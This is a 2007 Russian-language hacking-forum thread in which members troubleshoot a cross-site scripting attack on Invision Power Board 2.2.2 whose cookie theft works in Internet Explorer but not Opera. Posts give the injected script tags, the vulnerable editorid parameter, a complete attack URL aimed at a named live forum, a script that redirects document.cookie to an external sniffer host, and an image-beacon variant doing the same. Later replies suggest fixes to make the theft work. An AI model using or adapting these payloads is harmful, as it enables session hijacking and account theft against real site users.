Форумы Xss в Ipb 2.2.2

Discussion in 'Уязвимости CMS/форумов' started by Z0mbie!, 15 Aug 2007.

  1. Z0mbie!

    Z0mbie! New Member

    Joined:
    14 Aug 2007
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    под Ie Xss пашед....НО под оперой нет,чо делать??!!
    ктнить подскажет?
     
  2. inv

    inv Banned

    Joined:
    3 Aug 2007
    Messages:
    261
    Likes Received:
    143
    Reputations:
    -58
    xss приведи с конкретным примером
     
  3. Z0mbie!

    Z0mbie! New Member

    Joined:
    14 Aug 2007
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    //--></script><SCRIPT SRC=http://ccp.on.ufanet.ru/cc.js></SCRIPT>
    отправляет куки. не пашет. сниффер s.netsec.ru.

    //--></script><SCRIPT SRC=http://ccp.on.ufanet.ru/al.js></SCRIPT>
    просто выводит алерт.пашет.

    исходник cc.js
    document.location="http://s.netsec.ru/CCCP.gif?"+document.cookie;
     
  4. inv

    inv Banned

    Joined:
    3 Aug 2007
    Messages:
    261
    Likes Received:
    143
    Reputations:
    -58
    конкретный пример это значит ссылка уязвимая сформированная тобой
     
  5. Z0mbie!

    Z0mbie! New Member

    Joined:
    14 Aug 2007
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    /jscripts/folder_rte_files/module_table.php?editorid=//--></
    script><SCRIPT SRC=></SCRIPT>//--></script><SCRIPT SRC=http://ccp.on.ufanet.ru/cc.js></SCRIPT>
    ----------------------------------------------------
    module_table.php?editorid= - уязвимый скрипт.

    //--></
    script><SCRIPT SRC=></SCRIPT>//--></script><SCRIPT SRC=http://ccp.on.ufanet.ru/cc.js></SCRIPT>
    вызывает скрипт сс.js каторый вызывает
    document.location="http://s.netsec.ru/CCCP.gif?"+document.cookie;
    и все ето хрень корректно работает под ие,но не пашет под оперой.
    хотя алерт оперра выводит.
     
    1 person likes this.
  6. inv

    inv Banned

    Joined:
    3 Aug 2007
    Messages:
    261
    Likes Received:
    143
    Reputations:
    -58
    Я тебя прошу дать ссылку чтобы я зашел по ней и посмотрел какой формируется код страницы ёмоё

    в опере символы урлкодируются
     
  7. Z0mbie!

    Z0mbie! New Member

    Joined:
    14 Aug 2007
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    щас.

    http://ufagames.ru/forums//jscripts/folder_rte_files/module_email.php?editorid=//--></script><SCRIPT SRC=http://ccp.on.ufanet.ru/cc.js></SCRIPT>
     
  8. inv

    inv Banned

    Joined:
    3 Aug 2007
    Messages:
    261
    Likes Received:
    143
    Reputations:
    -58
    зашел в опере...кинуло на сниф,убери в совем скрипте передаресацию и просто сделай алерт(document.cookie)

    проверь есть ли куки..
     
  9. Z0mbie!

    Z0mbie! New Member

    Joined:
    14 Aug 2007
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    есть. alert(document.cookie); работает норм.
     
  10. inv

    inv Banned

    Joined:
    3 Aug 2007
    Messages:
    261
    Likes Received:
    143
    Reputations:
    -58
    в асю постучи так быстрее будет
    4444107------------44
     
  11. fremax

    fremax New Member

    Joined:
    14 Feb 2007
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    У меня такая же байда. Тока куки не приходят на снифф даже под ие.
    Вот у меня есть документ html след. содержания -
    Code:
    <html>
    <head><title>wf</title></head>
    <body> 
    <?
     SetCookie("blablabla", "slom's");   
    ?>
     <script language="JavaScript">img = new Image(); img.src = "http://s.netsec.ru/fremax.gif?"+document.cookie;</script>  
    <script language="JavaScript">alert(document.cookie);</script> 
    </body>
     </html>
    выскакивает пустой алерт. Хотя если посмотреть в браузере куки, то видно что они установились. Подскажите, в чем может быть проблема?
     
    #11 fremax, 15 Aug 2007
    Last edited: 15 Aug 2007
  12. inv

    inv Banned

    Joined:
    3 Aug 2007
    Messages:
    261
    Likes Received:
    143
    Reputations:
    -58
    попробуй сделать document.domain = 'главный домен.xxx'
    надеюсь понятно
    если нет в асю
     
  13. Z0mbie!

    Z0mbie! New Member

    Joined:
    14 Aug 2007
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Э...хм,а поточнее номер?
     
  14. fremax

    fremax New Member

    Joined:
    14 Feb 2007
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    что не понятно, тире убери и все.
     
  15. Z0mbie!

    Z0mbie! New Member

    Joined:
    14 Aug 2007
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    тему клосед. всем inv биг спс.